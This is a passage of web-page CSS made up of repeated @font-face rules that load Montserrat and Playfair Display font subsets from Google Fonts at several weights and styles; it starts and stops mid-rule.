{font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: 